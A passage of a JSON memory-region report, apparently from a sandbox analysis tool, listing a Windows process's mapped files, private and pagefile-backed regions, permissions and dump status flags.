"region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 36241408, "type": "region", "version": 1 }, "end_va": 36306943, "entry_point": 36241408, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\History\\History.IE5\\MSHist012017122020171221\\index.dat", "id": "region_1164", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\history\\history.ie5\\mshist012017122020171221\\index.dat", "region_type": "memory_mapped_file", "start_va": 36241408, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36306944, "type": "region", "version": 1 }, "end_va": 36311039, "entry_point": 0, "filename": null, "id": "region_1165", "name": "pagefile_0x00000000022a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36306944, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 36896768, "type": "region", "version": 1 }, "end_va": 37945343, "entry_point": 36896768, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db", "id": "region_1166", "name": "thumbcache_32.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db", "region_type": "memory_mapped_file", "start_va": 36896768, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37945344, "type": "region", "version": 1 }, "end_va": 37949439, "entry_point": 0, "filename": null, "id": "region_1167", "name": "pagefile_0x0000000002430000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37945344, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 38010880, "type": "region", "version": 1 }, "end_va": 38019071, "entry_point": 0, "filename": null, "id": "region_1168", "name": "pagefile_0x0000000002440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38010880, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 38076416, "type": "region", "version": 1 }, "end_va": 38092799, "entry_point": 38076416, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1169", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 38076416, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 38141952, "type": "region", "version": 1 }, "end_va": 38150143, "entry_point": 0, "filename": null, "id": "region_1170", "name": "pagefile_0x0000000002460000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38141952, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 38207488, "type": "region", "version": 1 }, "end_va": 38211583, "entry_point": 38207488, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{1FA14682-CABC-4310-BDEA-6ED0DE65ED67}.2.ver0x0000000000000001.db", "id": "region_1171", "name": "{1fa14682-cabc-4310-bdea-6ed0de65ed67}.2.ver0x0000000000000001.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{1fa14682-cabc-4310-bdea-6ed0de65ed67}.2.ver0x0000000000000001.db", "region_type": "memory_mapped_file", "start_va": 38207488, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 38273024, "type": "region", "version": 1 }, "end_va": 38289407, "entry_point": 38273024, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1172", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 38273024, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38338560, "type": "region", "version": 1 }, "end_va": 38342655, "entry_point": 0, "filename": null, "id": "region_1173", "name": "private_0x0000000002490000", "norm_filename": null, "region_type": "private_memory", "start_va": 38338560, "timestamp": "00:01:06.767", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38404096, "type": "region", "version": 1 }, "end_va": 38408191, "entry_point": 0, "filename": null, "id": "region_1174", "name": "private_0x00000000024a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38404096, "timestamp": "00:01:06.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38469632, "type": "region", "version": 1 }, "end_va": 38473727, "entry_point": 0, "filename": null, "id": "region_1175", "name": "private_0x00000000024b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38469632, "timestamp": "00:01:06.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38535168, "type": "region", "version": 1 }, "end_va": 38539263, "entry_point": 0, "filename": null, "id": "region_1176", "name": "private_0x00000000024c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38535168, "timestamp": "00:01:06.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 38862847, "entry_point": 0, "filename": null, "id": "region_1177", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:01:06.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38862848, "type": "region", "version": 1 }, "end_va": 38866943, "entry_point": 0, "filename": null, "id": "region_1178", "name": "private_0x0000000002510000", "norm_filename": null, "region_type": "private_memory", "start_va": 38862848, "timestamp": "00:01:06.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38928384, "type": "region", "version": 1 }, "end_va": 38932479, "entry_point": 0, "filename": null, "id": "region_1179", "name": "private_0x0000000002520000", "norm_filename": null, "region_type": "private_memory", "start_va": 38928384, "timestamp": "00:01:06.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38993920, "type": "region", "version": 1 }, "end_va": 38998015, "entry_point": 0, "filename": null, "id": "region_1180", "name": "private_0x0000000002530000", "norm_filename": null, "region_type": "private_memory", "start_va": 38993920, "timestamp": "00:01:06.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39059456, "type": "region", "version": 1 }, "end_va": 39321599, "entry_point": 0, "filename": null, "id": "region_1181", "name": "private_0x0000000002540000", "norm_filename": null, "region_type": "private_memory", "start_va": 39059456, "timestamp": "00:01:06.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 39321600, "type": "region", "version": 1 }, "end_va": 39739391, "entry_point": 39321600, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1182", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 39321600, "timestamp": "00:01:06.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39780352, "type": "region", "version": 1 }, "end_va": 40042495, "entry_point": 0, "filename": null, "id": "region_1183", "name": "private_0x00000000025f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39780352, "timestamp": "00:01:06.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 40042496, "type": "region", "version": 1 }, "end_va": 41091071, "entry_point": 0, "filename": null, "id": "region_1184", "name": "private_0x0000000002630000", "norm_filename": null, "region_type": "private_memory", "start_va": 40042496, "timestamp": "00:01:06.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 41091072, "type": "region", "version": 1 }, "end_va": 41095167, "entry_point": 0, "filename": null, "id": "region_1185", "name": "private_0x0000000002730000", "norm_filename": null, "region_type": "private_memory", "start_va": 41091072, "timestamp": "00:01:06.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41418751, "entry_point": 0, "filename": null, "id": "region_1186", "name": "private_0x0000000002740000", "norm_filename": null, "region_type": "private_memory", "start_va": 41156608, "timestamp": "00:01:06.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 41418752, "type": "region", "version": 1 }, "end_va": 51052543, "entry_point": 41418752, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_1187", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 41418752, "timestamp": "00:01:06.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 51052544, "type": "region", "version": 1 }, "end_va": 51060735, "entry_point": 0, "filename": null, "id": "region_1188", "name": "pagefile_0x00000000030b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 51052544, "timestamp": "00:01:06.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 51118080, "type": "region", "version": 1 }, "end_va": 51134463, "entry_point": 51118080, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1189", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 51118080, "timestamp": "00:01:06.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 51183616, "type": "region", "version": 1 }, "end_va": 51187711, "entry_point": 0, "filename": null, "id": "region_1190", "name": "private_0x00000000030d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51183616, "timestamp": "00:01:06.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 51249152, "type": "region", "version": 1 }, "end_va": 51253247, "entry_point": 51249152, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db", "id": "region_1191", "name": "thumbcache_1024.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db", "region_type": "memory_mapped_file", "start_va": 51249152, "timestamp": "00:01:06.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 51314688, "type": "region", "version": 1 }, "end_va": 51318783, "entry_point": 51314688, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db", "id": "region_1192", "name": "thumbcache_sr.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db", "region_type": "memory_mapped_file", "start_va": 51314688, "timestamp": "00:01:06.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 51380224, "type": "region", "version": 1 }, "end_va": 51384319, "entry_point": 51380224, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{4CA276EC-52B8-4975-9DCF-73426EA8BE98}.2.ver0x0000000000000002.db", "id": "region_1193", "name": "{4ca276ec-52b8-4975-9dcf-73426ea8be98}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{4ca276ec-52b8-4975-9dcf-73426ea8be98}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 51380224, "timestamp": "00:01:06.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 51445760, "type": "region", "version": 1 }, "end_va": 51462143, "entry_point": 51445760, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1194", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 51445760, "timestamp": "00:01:06.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 51511296, "type": "region", "version": 1 }, "end_va": 51515391, "entry_point": 51511296, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{AAA8DCD7-A38D-4E8A-B14C-574F94213A00}.2.ver0x0000000000000001.db", "id": "region_1195", "name": "{aaa8dcd7-a38d-4e8a-b14c-574f94213a00}.2.ver0x0000000000000001.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{aaa8dcd7-a38d-4e8a-b14c-574f94213a00}.2.ver0x0000000000000001.db", "region_type": "memory_mapped_file", "start_va": 51511296, "timestamp": "00:01:06.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 51576832, "type": "region", "version": 1 }, "end_va": 51580927, "entry_point": 51576832, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db", "id": "region_1196", "name": "thumbcache_idx.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db", "region_type": "memory_mapped_file", "start_va": 51576832, "timestamp": "00:01:06.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 51642368, "type": "region", "version": 1 }, "end_va": 51904511, "entry_point": 0, "filename": null, "id": "region_1197", "name": "private_0x0000000003140000", "norm_filename": null, "region_type": "private_memory", "start_va": 51642368, "timestamp": "00:01:06.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 51904512, "type": "region", "version": 1 }, "end_va": 52166655, "entry_point": 0, "filename": null, "id": "region_1198", "name": "private_0x0000000003180000", "norm_filename": null, "region_type": "private_memory", "start_va": 51904512, "timestamp": "00:01:06.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 52166656, "type": "region", "version": 1 }, "end_va": 52170751, "entry_point": 0, "filename": null, "id": "region_1199", "name": "pagefile_0x00000000031c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 52166656, "timestamp": "00:01:06.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 52232192, "type": "region", "version": 1 }, "end_va": 52236287, "entry_point": 52232192, "filename": "\\Windows\\System32\\en-US\\wdmaud.drv.mui", "id": "region_1200", "name": "wdmaud.drv.mui", "norm_filename": "c:\\windows\\system32\\en-us\\wdmaud.drv.mui", "region_type": "memory_mapped_file", "start_va": 52232192, "timestamp": "00:01:06.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 52297728, "type": "region", "version": 1 }, "end_va": 52305919, "entry_point": 0, "filename": null, "id": "region_1201", "name": "pagefile_0x00000000031e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 52297728, "timestamp": "00:01:06.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 52363264, "type": "region", "version": 1 }, "end_va": 52625407, "entry_point": 0, "filename": null, "id": "region_1202", "name": "private_0x00000000031f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 52363264, "timestamp": "00:01:06.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 52625408, "type": "region", "version": 1 }, "end_va": 52629503, "entry_point": 52625408, "filename": "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui", "id": "region_1203", "name": "mmdevapi.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui", "region_type": "memory_mapped_file", "start_va": 52625408, "timestamp": "00:01:06.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 52690944, "type": "region", "version": 1 }, "end_va": 52699135, "entry_point": 0, "filename": null, "id": "region_1204", "name": "private_0x0000000003240000", "norm_filename": null, "region_type": "private_memory", "start_va": 52690944, "timestamp": "00:01:06.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 52756480, "type": "region", "version": 1 }, "end_va": 52764671, "entry_point": 0, "filename": null, "id": "region_1205", "name": "pagefile_0x0000000003250000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 52756480, "timestamp": "00:01:06.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 52822016, "type": "region", "version": 1 }, "end_va": 52830207, "entry_point": 0, "filename": null, "id": "region_1206", "name": "pagefile_0x0000000003260000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 52822016, "timestamp": "00:01:06.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 52887552, "type": "region", "version": 1 }, "end_va": 53149695, "entry_point": 0, "filename": null, "id": "region_1207", "name": "private_0x0000000003270000", "norm_filename": null, "region_type": "private_memory", "start_va": 52887552, "timestamp": "00:01:06.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 208896, "start_va": 53149696, "type": "region", "version": 1 }, "end_va": 53358591, "entry_point": 0, "filename": null, "id": "region_1208", "name": "private_0x00000000032b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 53149696, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 53411840, "type": "region", "version": 1 }, "end_va": 53673983, "entry_point": 0, "filename": null, "id": "region_1209", "name": "private_0x00000000032f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 53411840, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 53673984, "type": "region", "version": 1 }, "end_va": 53682175, "entry_point": 0, "filename": null, "id": "region_1210", "name": "pagefile_0x0000000003330000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 53673984, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 53739520, "type": "region", "version": 1 }, "end_va": 53743615, "entry_point": 0, "filename": null, "id": "region_1211", "name": "private_0x0000000003340000", "norm_filename": null, "region_type": "private_memory", "start_va": 53739520, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 53805056, "type": "region", "version": 1 }, "end_va": 53809151, "entry_point": 0, "filename": null, "id": "region_1212", "name": "pagefile_0x0000000003350000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 53805056, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 53870592, "type": "region", "version": 1 }, "end_va": 53874687, "entry_point": 0, "filename": null, "id": "region_1213", "name": "pagefile_0x0000000003360000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 53870592, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 53936128, "type": "region", "version": 1 }, "end_va": 54198271, "entry_point": 0, "filename": null, "id": "region_1214", "name": "private_0x0000000003370000", "norm_filename": null, "region_type": "private_memory", "start_va": 53936128, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 327680, "start_va": 54198272, "type": "region", "version": 1 }, "end_va": 54525951, "entry_point": 0, "filename": null, "id": "region_1215", "name": "private_0x00000000033b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 54198272, "timestamp": "00:01:06.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 294912, "start_va": 54525952, "type": "region", "version": 1 }, "end_va": 54820863, "entry_point": 0, "filename": null, "id": "region_1216", "name": "private_0x0000000003400000", "norm_filename": null, "region_type": "private_memory", "start_va": 54525952, "timestamp": "00:01:06.780", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001217-addr_0x0000000003450000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_209", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 54853632, "type": "region", "version": 1 }, "end_va": 54865919, "entry_point": 0, "filename": null, "id": "region_1217", "name": "private_0x0000000003450000", "norm_filename": null, "region_type": "private_memory", "start_va": 54853632, "timestamp": "00:01:06.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 54919168, "type": "region", "version": 1 }, "end_va": 55181311, "entry_point": 0, "filename": null, "id": "region_1218", "name": "private_0x0000000003460000", "norm_filename": null, "region_type": "private_memory", "start_va": 54919168, "timestamp": "00:01:06.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 55181312, "type": "region", "version": 1 }, "end_va": 55443455, "entry_point": 0, "filename": null, "id": "region_1219", "name": "private_0x00000000034a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 55181312, "timestamp": "00:01:06.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 55443456, "type": "region", "version": 1 }, "end_va": 55447551, "entry_point": 0, "filename": null, "id": "region_1220", "name": "pagefile_0x00000000034e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 55443456, "timestamp": "00:01:06.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 55508992, "type": "region", "version": 1 }, "end_va": 55771135, "entry_point": 0, "filename": null, "id": "region_1221", "name": "private_0x00000000034f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 55508992, "timestamp": "00:01:06.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 55771136, "type": "region", "version": 1 }, "end_va": 